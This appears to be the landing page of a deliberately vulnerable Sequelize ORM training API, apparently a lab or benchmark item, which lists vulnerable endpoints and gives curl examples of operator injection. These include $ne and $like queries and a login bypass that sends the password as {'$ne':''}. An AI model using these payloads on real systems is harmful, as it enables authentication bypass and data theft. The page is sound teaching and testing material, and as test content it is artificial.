APEX-032-25: Sequelize ORM Injection API

Welcome to the vulnerable API. This application demonstrates ORM Injection vulnerabilities in Sequelize.

Hint: Try using Sequelize operators in search parameters. Example: ?search[$ne]=null

API Endpoints

GET /api/users VULNERABLE

List/search users. Supports search, role, status parameters.

GET /api/users/:id

Get user by ID.

POST /api/users/search VULNERABLE

Advanced search with JSON body. Accepts filters object.

POST /api/auth/login VULNERABLE

User login. Requires username and password.

POST /api/auth/register

Register new user.

GET /api/products VULNERABLE

List products with filters.

Test Credentials

Example Attacks

1. Return All Users ($ne operator)

curl "http://localhost:3000/api/users?search[\$ne]=null"

2. Wildcard Search ($like operator)

curl "http://localhost:3000/api/users?search[\$like]=%"

3. Authentication Bypass

curl -X POST http://localhost:3000/api/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":{"$ne":""}}'

4. JSON Body Injection

curl -X POST http://localhost:3000/api/users/search \
  -H "Content-Type: application/json" \
  -d '{"filters":{"role":"admin"}}'